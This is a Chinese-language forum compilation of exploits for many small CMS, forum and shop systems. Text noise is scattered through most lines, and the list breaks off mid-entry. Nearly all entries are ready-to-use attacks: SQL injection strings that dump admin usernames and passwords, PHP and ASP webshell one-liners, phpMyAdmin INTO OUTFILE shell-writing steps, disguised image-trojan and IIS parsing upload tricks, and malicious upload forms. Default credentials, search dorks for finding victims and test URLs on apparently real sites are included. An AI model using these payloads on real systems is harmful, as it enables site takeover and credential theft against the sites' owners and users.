启航企业建站系统 cookie注入漏洞通杀所有版本
/ L/ Q p% I3 s0 x3 H+ I, G
* ~$ W; P) m8 u6 P直接上exploit:
' G5 @% W9 `9 k7 o5 Y, O1 vjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
5 e1 I3 [ d7 e: T d0 otest:http://www.tb11.net/system/xitong/shownews.asp?id=2106 {- V; P- X: i1 V
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. c, J, ?5 j' F+ p) l, j l
Asprain论坛 注册用户 上传图片就可拿到webshell
( k9 ?0 S2 X( h5 G) ^1 n% P e
, v6 S' o7 E3 ^7 ?+ b% x2 p( HAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
: y/ P% G/ [; `/ z$ ~1.txt存放你的一句话马 如:<%execute(request("cmd"))%># f* T: v' D# s. l5 ~3 y8 Q
2.gif 为一小图片文件,一定要小,比如qq表情图片8 X( i' g/ t. i |1 j! r
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
+ ?/ q0 i# f5 r7 w1 `: W4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
7 ^" c$ {7 N# ?' i% [2 L% K5.q.asp;.gif2 p% K" L1 a7 t/ {8 c) ~1 h
google:Powered by Asprain
# S( M4 A0 y. ]( n--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ c# v, d! R# B2 ?1 i# O2 v
0 y7 b/ r& ]! D/ TShopNum1全部系统存在上传漏洞。
: q, E9 \. k7 G- c, B7 F/ Y7 @' o1 g: s
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。. L' j0 S" _8 I* f
按说明 提示登录后台。。, C n) x+ T2 n# l( }/ [5 H
在后台功能页面->附件管理->附件列表
" a; ]8 c( r) ~5 c& w3 M: S6 j可以直接上传.aspx 后缀木马
3 q6 \4 M& a4 e3 R; ?2 Dhttp://demo.shopnum1.com/upload/20110720083822500.aspx
9 ^- H" G; I6 `--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! y" r U8 k/ h# S8 Q% J; V2 M% ~5 G- z2 L, H- [! K1 n0 R
牛牛CMS中小企业网站管理系统 上传漏洞3 D% }; G5 Y* t+ m! C
' \, q) j( `/ p. C
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
" E9 e" l. V$ R: S' E( c8 ~7 E后台:admin/login.asp1 y- W" c! ?" m7 B) V
ewebeditor 5.5 Nday2 K+ L2 W+ B' P( E& P
exp:$ o* P7 [1 r$ ?& ?0 N
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
7 a; l6 P) o$ @7 D6 |<input?type=file?name=uploadfile?size=100><br><br>?
I; \9 V6 r# ^ g3 ?4 }, z5 U8 _4 m<input?type=submit?value=upload>?7 u' z7 |6 B& P% r# |2 D+ x
</form>3 Z9 ~* p7 i% ]4 k; S1 Q. }3 |+ k
ps:先上传小马.( n7 J4 |1 \7 t4 a. Q7 b
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏7 v$ P, L; {9 H: l& G
- B# v- O: r- f( s5 m
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ B" ]/ O% r- x. o* p( D% W
0 ]2 O" a! `2 g( q# r; ~; }2 H
YothCMS 遍历目录漏洞
( f6 R/ C- H( f2 O, l0 j
& x5 S3 B5 A9 p3 H1 v$ N; [) i Y# p优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。" G( q6 e' P6 [8 Z
默认后台:admin/login.asp
1 t$ K6 e) o7 M. E" J遍历目录:4 s+ n$ ]3 ], ?: z" @( \7 C
ewebeditor/manage/upload.asp?id=1&dir=../( \* u: I- o6 R0 x1 W; B
data:3 Z, Q" a% N2 z! y3 _6 G; d
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
# h0 I0 z2 H1 j/ C* h& I; f, q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* d& V3 i! ]7 [
9 H* R, N! l/ A# }Net112企业建站系统 1.0* I' v7 T! }! e. v) a
$ F* ?) ~/ I8 b源码简介:. I+ N8 B" {% X) P9 m
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
& b8 _# Z1 `# e添加管理员:
0 E0 s D! a+ T- x5 q: b9 z/ L5 \http://www.0855.tv/admin/admin.asp?action=add&level=2
) u# ]0 t4 e; r) w, X+ H/ k' Q其实加不加都不是很重要,后台文件都没怎么作验证。6 Z; A- }' m3 x% g& \! N
上传路径:. ^8 {# T+ d( ~
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
% x# T- g$ `$ K2 qhttp://www.0855.tv/inc/Upfile.asp?Stype=2
; e/ W+ b' `( U$ F怎么利用自己研究。
4 m3 u+ i( K4 p' z/ [遍历目录:: P1 H r" D( i( N7 m/ ?+ H
http://www.0855.tv/admin/upfile.asp?path=../..
% v$ t0 V5 U2 g( x: c如:
3 c* S9 E$ _, Dhttp://www.0855.tv/admin/upfile.asp?path=../admin- E. d* d, B6 f0 x( e& H+ `
http://www.0855.tv/admin/upfile.asp?path=../data; ?4 w; b' n% O
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 m2 n3 d3 m: n N: j
7 g( ]* t6 X/ n8 I2 C- D易和阳光购物商城通杀 上传漏洞
/ @6 s* V: Y! g- G' i
& I+ l5 d& _0 s4 P1 a. u4 w# r2 b前提要求是IIS6.0+asp坏境。
4 c G6 I; {+ ?, g* m! O/ ^漏洞文件Iheeo_upfile.asp 2 _8 X, S: i1 I, W- g5 O! q
过滤不严.直接可以iis6.0上传9 |! V# `3 b1 k" v/ U4 w
把ASP木马改成0855.asp;1.gif0 B3 _9 j/ t$ g+ b
直接放到明小子上传
; W7 J; k8 M# V, CGoogle搜索:inurl:product.asp?Iheeoid=
! {' G% V+ v8 p6 ~: ?. \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 v/ v" y" G. y/ S3 Z7 P5 {( G
4 z* s) ^8 c i M) mphpmyadmin后台4种拿shell方法
s* M6 o4 {8 E6 y
; y9 e7 i ^2 \- s1 ^6 C% ~方法一:. n5 Z- q* n! n$ r( U3 R+ W; W7 z
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
+ {" [; H, [5 a3 R: R# fINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');4 ?7 b, V9 n8 u( s4 Q1 v6 x
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
6 b6 n, R9 _6 y5 L0 N----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php- Y! O4 c4 r/ _( N
一句话连接密码:xiaoma
0 ]- z( Z) C7 v' A9 I方法二:0 t6 Y; P4 f% S2 [- |
Create TABLE xiaoma (xiaoma1 text NOT NULL);
- z( C4 I7 S, q0 z( l J& fInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
/ a! i P' e/ y Q3 {7 l9 {* b' Bselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';) [+ {6 w7 y) \2 c* J) }
Drop TABLE IF EXISTS xiaoma;% b8 u8 P1 o( m& @
方法三:- _: t4 a# i6 w
读取文件内容: select load_file('E:/xamp/www/s.php');- d+ M6 q" b& ]$ W
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'# Z2 W& s3 ^2 X7 K" U
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'3 b0 V8 G- k6 E/ w) t. p% r4 z& }
方法四:
2 g3 _5 R8 o# Tselect load_file('E:/xamp/www/xiaoma.php');
6 b3 A: b8 M2 F( Kselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
8 A5 g" P$ x: {! I9 h. H3 x6 ]然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
* J4 ]% t' C- d* ~--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, A' i) `( h8 f. k" a! t: C/ i' b7 N
传信网络独立开发网站源码0day漏洞- x$ B, S( E) c; U! E3 @9 t
3 W. W: {$ t* T, _( Q
后台system/login.asp% j3 \# R6 t$ N" d( H9 N
进了后台有个ewebeditor
4 l' d* g* P, r XGoogle 搜索inurl:product1.asp?tyc=
+ {0 z( e& z% k" _* p$ o6 S编辑器漏洞默认后台ubbcode/admin_login.asp
3 F3 Y( G; m) q) L) {数据库ubbcode/db/ewebeditor.mdb( F9 |; ]) G) p8 P
默认账号密码yzm 111111
9 K6 {& _6 J1 d$ R. C) P( L/ M0 V ` @4 \5 f K5 c: U/ b
拿webshell方法4 O+ l. u6 h0 Y' I
登陆后台点击“样式管理”-选择新增样式
2 A8 ?" a( Y' J' O样式名称:scriptkiddies 随便写 , P% ^3 z2 o, T. X& Z
路径模式:选择绝对路径 ) L8 L/ R& l; s/ i% }( j+ X
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx) d) B% D2 U# t: G9 o8 H
图片类型比如就是我们要上传的ASP木马格式
9 B- V% n4 P/ r8 F8 U上传路径:/
, B+ ?, ?; r) e; f2 w图片限制:写上1000 免的上不了我们的asp木马
5 L4 @) h% J; O1 t% ]6 R上传内容不要写( N# U+ Q% v) ~
可以提交了
8 l" Q0 @6 z5 J0 o+ p- U) l# \样式增加成功! - Q# c2 p2 [; g2 D2 y
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
4 m" |0 Y& x: I& B3 k: T按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
4 o; s' S% [$ v7 s' S网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
; h2 g, J7 M9 y* V) A8 r上ASP木马 回车 等到路径
7 ^1 q+ F- n/ U0 d Q. A& b# z6 O# Q/ n& t" O( e
后台:system/login.asp8 X/ H8 I, n3 W3 M7 K5 \
Exp:+ }( O% j+ a/ m
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
+ u$ b2 \& H1 n9 h测试:0 b/ t- L' R) W) S x0 T
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
% a2 A& B; G, chttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
* @6 w/ z2 x1 X# J9 @4 y4 ~% T0 ?--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 Z6 `5 u9 ?* T9 S" V! W
5 y4 D0 \# G9 b- c! I% i% Afoosun 0day 最新注入漏洞$ n6 D( A# g/ ^6 C2 i7 |1 l- v' Z. i
: V: x0 ~8 s) ^- L9 E. `漏洞文件:www.xxx.com/user/SetNextOptions.asp
' ^- ]9 t4 c: D利用简单的方法:- \* s+ {# z& n) e
暴管理员帐号:
/ M% u& u; B2 _; L4 m, y" Dhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
% q# d0 M, `1 w" |0 \暴管理员密码:
, }1 B% e! N' o9 mhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,7 Y* c1 i* ?! ^5 U! Q4 { w; l
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 t2 ^# v% v, U, o+ P$ K' c, \7 ^% ?$ I9 h
网站程序的版权未知!
* `5 m9 N9 u; y4 ?4 Y' c
% N& `/ C. x7 r默认网站数据库:& R; P l7 R3 o2 A/ R
www.i0day.com/data/nxnews.mdb
- G) d9 K9 c2 i( Y+ v) G& Yewebeditor 在线编辑器:
- ]3 {- V0 }! E: H! U3 X ~# }8 o编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb# t; U; v# Y2 N B
登录地址:ewebeditor/admin_login.asp
: K' L6 R% D q6 D T) M默认密码:admin admin& V+ v6 D8 g9 B, @9 T
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
( ] m8 R# f/ k
, |" k( Q$ h7 n* B/ ?! }" dSql注入漏洞:
" w5 t" [; V+ s3 m4 S0 V2 @http://www.i0day.com/detail.asp?id=12" Y* s4 W; J" o3 D: p
exp:
* c1 F* Z. S9 L( t0 M+ U) H2 Munion select 1,admin,password,4,5,6,7,8 from admin
0 l' H7 ~: z3 j# l爆出明文帐号/密码7 a2 A9 k7 e% r9 `! U3 d! h
n: K/ L' J: ~" A- F& b
上传漏洞:$ u* j. c/ y: n3 z& D9 W
后台+upfile.asp! ?! G6 C7 `+ l" k7 f r* G G
如:5 q: R* I9 `4 \+ @6 g9 H
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。4 S, A) x$ X2 R D3 a3 H4 p- \
shell的地址:网址+后台+成功上传的马
, c. m/ _% R5 V4 I- o1 ugoogle:inurl:news.asp?lanmuName=
' G8 s- c9 ~7 P% a3 Z' w3 I------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) K; q9 S/ m4 m6 O5 \# m/ K+ F7 F1 B. o# Q- `* f# |( P
dedecms最新0day利用不进后台直接拿WEBSHELL
5 x6 j) h) Y( G Q
6 k$ b: G0 s a! A7 [7 j" r0 J0 R拿webshell的方法如下:
" O/ G* @+ X8 m: [. J网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.; j1 q" n' ]( ~+ a2 u' C$ W) b
前题条件,必须准备好自己的dede数据库,然后插入数据:" N2 M# r- i V3 D* N6 K" t ~+ D: `* v
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
" }3 s4 u/ T: E" g3 }
/ f7 ^( Q9 Z' V5 \% {, H+ M, O再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
% c% r0 H( Q1 r. }<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">' w+ V3 L. D/ ?& j; x9 e
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
4 \5 e( O r: e" X7 L9 p& s<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />& f: X0 O& B, r- ~
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
0 `! Q% G% r) k2 d1 e<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />+ s+ B, w7 O$ @& w1 }$ L+ W# e
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />" \* r- F6 K' K' U
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
) k- \ K( R) S- L0 L2 l/ n<input type="text" value="true" name="nocache" style="width:400">; Z$ y3 e' T1 E' ]
<input type="submit" value="提交" name="QuickSearchBtn"><br />
. P) F1 p4 L7 C5 Y o$ v; R</form>$ `6 \% }9 A5 F! n8 X- `
<script>
! U, J5 G% N7 r) L+ [- o dfunction addaction()
4 p: x! Z+ ? \" [1 q v8 M{
9 L7 s1 A5 L* l* @$ M! q& Ldocument.QuickSearch.action=document.QuickSearch.doaction.value;
* d) J6 `4 S2 \ E0 {' T}! @1 K& f, h! S6 H5 n" ]
</script>+ U# |' B: g+ h. G9 r/ w* P" w
-----------------------------------------------------------------------------------------------------------------------------------------------
) {5 x. E$ J7 T& H+ C1 K5 d G W% E" m9 ~
dedecms织梦暴最新严重0day漏洞& x' c. \* L: [$ o( D; l
bug被利用步骤如下:% x/ _& P) R- q5 b4 b A6 M
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
# F3 J0 _- b# C t9 n' Z y把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
. }# |# x0 f4 T' s- h8 j* h5 S-------------------------------------------------------------------------------------------------------------------------------------------, k3 m9 [1 a4 y# |- b6 H$ \
) D# S( N* v6 W
多多淘宝客程序上传漏洞 6 }, |% k4 ~ e
漏洞页面:& H& |- @9 h4 G2 M% W4 }
admin\upload_pic.php
i( F, I& A! h t5 F) B传送门:( I, i( y/ A" B5 ?7 Z3 O g
http://www.www.com/admin/upload_pic.php?uploadtext=slide18 H. J. h" I" r& d$ t: @
PS:copy张图片马 直接 xxx.php 上传抓包地址! m4 u1 G" Z& i2 g" A
------------------------------------------------------------------------------------------------------------------------------------------------------
2 l8 K- V5 ]7 U2 M" v4 ]% \# x
- Z: Y+ j# [+ Z# j; m5 Y" W无忧公司系统ASP专业版后台上传漏洞$ @) ~: w/ R0 S0 O
漏洞文件 后台上传: V9 n, I( o: L; S6 J0 }
admin/uploadPic.asp
4 A! V( b& j3 z# l8 I6 a d L漏洞利用 这个漏洞好像是雷池的. g" k; q [/ A* Y1 Y
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1$ }' x! M& s/ U
等到的webshell路径:
# ^ S9 [% J& D# i9 Z/UploadFiles/scriptkiddies.asp;_2.gif# R: X) i8 f1 R
---------------------------------------------------------------------------------------------------------------------------------------------------
+ D# ]; q+ [/ \) m3 J3 V! k' B V# C4 W) Q) u
住哪酒店分销联盟系统2010
, a$ s; X0 Y+ Y0 Q- `' d3 y( i1 P: y( uSearch:
7 m' g; C: l4 K4 o8 pinurl:index.php?m=hotelinfo" |# I8 h3 `9 l$ V6 b" z
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
3 E3 _* ^2 j; C5 d2 O! I" s默认后台:index.php?m=admin/login5 _" W. k% q' e4 h
--------------------------------------------------------------------------------------------------------------------------------------------------
7 S9 V4 N$ s6 H
1 d. L; L2 b0 B. [9 ^ G/ ~0 h/ Rinurl:info_Print.asp?ArticleID=. c. Y5 p+ ?: n$ C8 h0 w H4 g
后台 ad_login.asp
) F4 V3 U' \4 }, E7 {爆管理员密码:; x! H/ c8 x r4 G. _
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
- r8 K; d) [# R$ J) o7 G! K------------------------------------------------------------------------------------------------------------------------------------------------------------6 l2 j4 a! V1 I2 c% ^
* g0 a* \. D, T* e% s& H ]搜索框漏洞!
z6 x& U, I7 b%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
# G$ B: F7 k7 Y* u+ D. |& f--------------------------------------------------------------------------------------------------------------------------------------------------------
7 q4 k. i6 ^% C( B2 f% P/ g. v" d2 i, h
关键字:
9 m% X; k5 D' G; p: ^inurl:/reg_TemletSel.asp?step=2# J7 N- J/ H- A; N, @7 P' ^
或者) Y5 S. y1 d/ m
电子商务自助建站--您理想的助手
9 H' L% S, [2 V. G% p7 q-------------------------------------------------------------------------------------------------------------------------------------------------# c9 X+ N- h/ i
7 D" _7 ~7 [. ^
iGiveTest 2.1.0注入漏洞3 p# J( ? _, N5 q+ ?
Version: <= 2.1.02 R( ~0 Z; `$ }4 }
# Homepage: http://iGiveTest.com/9 Q) ~6 X4 F1 ^* V: ]1 h8 Y! r
谷歌关键字: “Powered by iGiveTest”6 m; h% x7 t3 U5 [) B
随便注册一个帐号。然后暴管理员帐号和密码
, ^* S4 [1 w6 ^! g% b9 Dhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1" ]7 Z& D5 h+ H2 K$ n3 v2 u: c
------------------------------------------------------------------------------------------------------------------------------------------------% }# M( a9 G, @$ u. X/ v
" W4 |9 ]2 |7 y N' Z) |7 ^
CKXP网上书店注入漏洞0 t I h) q- y
工具加表:shop_admin 加字段:admin% a4 z' E6 W( C- z, a1 l% Z9 P
后台:admin/login.asp 2 z" a& J# p9 s4 z
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/4 y+ g+ o1 N6 i- o. L3 R R
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
$ H' t* X5 L7 G1 h" F8 P--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 K$ V5 _" |0 C' v% A+ A+ x' |
0 a, ~% R* |8 m" d h
段富超个人网站系统留言本写马漏洞3 t1 D& c+ ?# X
源码下载:http://www.mycodes.net/24/2149.htm& T' ^' K% B. W9 e! K3 K
addgbook.asp 提交一句话。
. I! `: z5 b5 Z" z; T$ B0 |. }连接: http://www.xxxx.tv/date/date3f.asp- H* ~; T9 h D, O6 B2 S6 w" L+ o7 }
google:为防批量,特略!! p4 Y- N3 s8 G3 e* q+ V
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ |7 `. ~5 F# e, o! e
5 S( @* [1 _0 j- d K智有道专业旅游系统v1.0 注入及列目录漏洞
2 [4 m% e+ o) d- \8 J+ w默认后台路径:/admin/login.asp
" Q" Q6 t4 W+ k0 E) O- q, A默认管理员:admin
4 e. Z" x1 o8 V4 E6 S默认密码:123456
. @% s0 s# w6 N b- F. U3 a4 i, K. WSQL EXP Tset:4 H- p' m) t' m L) b
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
2 W, G+ K7 g O3 I: x------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 B' k+ v$ ?7 n6 _4 [
/ d! f# G9 w: X2 a1 \ewebeditor(PHP) Ver 3.8 本任意文件上传0day3 T, g0 e: g* }; c$ P, Q. V# _7 D- A
EXP:$ g5 l, d! L" H6 p2 \9 P# p1 v: g
<title>eWebeditoR3.8 for php任意文件上EXP</title>3 V! k. [) s+ R7 Y: B. r
<form action="" method=post enctype="multip
7 U' C9 M. v. k7 r8 m9 L8 k; Hart/form-data">
* O' J/ Y& F+ g6 T6 K4 s" g2 X<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
/ O- }6 H9 o3 \ v* aURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
9 C/ { O4 R' T; U. U) W<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> * b9 v8 l; L) e9 Z3 U7 \
file:<input type=file name="uploadfile"><br> : O, ]2 h4 q: a, Z! ?4 H& ?' s
<input type=button value=submit onclick=fsubmit()>
q2 q" [ {4 s/ M3 x& L/ y: S+ N</form><br>
; U* W; P8 u' u9 ^) d, {<script> 8 i) F8 [ z! M0 a C
function fsubmit(){
5 O; ]# I* R, S( N; Z( s5 t/ Pform = document.forms[0]; & _5 }9 S" r0 s: G$ ]& w
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
; n1 v5 B# o, S" f" ualert(form.action);
# U$ f' o0 W3 Gform.submit();
2 s. W$ o3 D1 W}
0 _% c+ G6 ~1 Q$ D) g; |6 E</script>/ ]* d( Z" R( z7 K& H6 d+ }
注意修改里面ewebeditor的名称还有路径。( l' N k% \' n8 s% S! _& g& t& {# R
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& c( D9 {+ R/ V: I+ [% M. v. E$ S N* D
提交’时提示ip被记录 防注入系统的利用
8 w9 I4 d: b5 W网址:http://www.xxx.com/newslist.asp?id=122′0 c5 L9 E1 |! \7 N" }5 G9 H4 S* L2 o
提示“你的操作已被记录!”等信息。' D7 y5 ?2 n7 {5 i* W
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
% \2 @& |# O/ u4 }) V-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ x/ M% {2 A/ j: T9 Q; _
" }! |8 h- G0 j* [- T西部商务网站管理系统 批量拿shell-0day' w: T# {" I+ u3 k2 F- X; P! m
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
+ q% F$ I7 K; m, k1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
4 E8 f8 U% n, Q: x2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合5 t& l8 U/ c* _' C ~
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂: Y R2 c6 H" k/ g+ C5 {
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------# Y L1 Z0 `, m0 _, X a
7 Y/ H9 l4 | f: B- l' |JspRun!6.0 论坛管理后台注入漏洞( n2 z( o, c1 j& L& x+ a1 D
' Z+ O1 p6 V( }% ?. q+ ?% e e
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:, `: ?# J4 Y0 p
JspRun!6.0
& s/ L4 R1 D: S: _' W/ [2 W+ \漏洞描述:# K7 @* u% o |
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
% F0 N% g3 ]; ^( T& O在处理后台提交的文件中ForumManageAction.java第1940行% ?( P" A9 `; i# {4 D3 H* P9 j
String export = request.getParameter("export");//直接获取,没有安全过滤
$ y; [$ z# X+ P9 K* i* d. c- Qif(export!=null){% U- U; w3 ~. x" `+ \
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...* _# `$ W- ~5 l% A5 c5 {, j5 U8 X6 U
if(styles==null||styles.size()==0){
* Y, U. b/ s& b# G<*参考
5 Q" `& D [( a7 ?nuanfan@gmail.com
: ^( R5 k T7 B' F# @8 ~/ R( n& L*> SEBUG安全建议:9 U' n$ y8 U# q+ \3 e
www.jsprun.net0 b. }( W+ ?3 R% A9 C- u+ J3 I
(1)安全过滤变量export
6 [( ~ d. C& h' l2 c* g1 L4 C(2)在查询语句中使用占位符
y" ^. ^& ]3 E' m" t# Z------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ R x& ^% ^9 C9 a6 e8 l1 _# F$ \0 q# i) Z" U; x0 S) p
乌邦图企业网站系统 cookies 注入
% d8 ^" T8 R( p- m0 Y( e9 }
" C o% m3 G$ C* K) ~/ W( b程序完整登陆后台:/admin/login.asp
7 p" L0 C& G3 c, i9 k0 Q6 ^' w2 L2 D$ S默认登陆帐号:admin 密码:admin888% F m6 ]3 w' k- j& z9 a& v: h8 {4 d
语句:(前面加个空格)3 a( u% Z) Z. e: l% P
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
) U O- x( v, Y2 g+ s+ A或者是16个字段:
8 L n6 w% N1 S3 Y1 Rand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
+ L. ?8 D9 ]8 }% z, |爆不出来自己猜字段。
& o z" q( z$ Z; O) C8 ~8 i, j注入点:http://www.untnt.com/shownews.asp?=88! H3 m4 o! c, ]5 V
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp. ~' o4 \+ v3 K8 {
关键字:& `6 o/ z/ q! {! R! @* `) }
inurl:shownews?asp.id=* M& J, W- q/ {6 l) c& P2 B
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ T1 Z! q r% T
1 e+ H1 B( [# G$ ~3 C2 YCKXP网上书店注入漏洞- [# B g$ Q( V6 w2 Q( w1 R6 q/ H
4 v1 H1 Y8 M: j. n' m c0 [
工具加表:shop_admin 加字段:admin6 Y3 {1 s% y1 a& G h1 F y0 ?
后台:admin/login.asp 3 s' d. ]- ~, _% L* M6 g p
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
# N# t, Z% Z' |; d6 pinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息4 F4 o v! m9 S
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* |3 J7 b" C. R! |# ~6 f: Y; A2 B
* P; {& i+ N" v' v2 Q; N) AYxShop易想购物商城4.7.1版本任意文件上传漏洞
9 ~3 @. _/ |4 _- v( T! }8 I9 \4 Q8 h0 J$ B) P# d( K# l# b
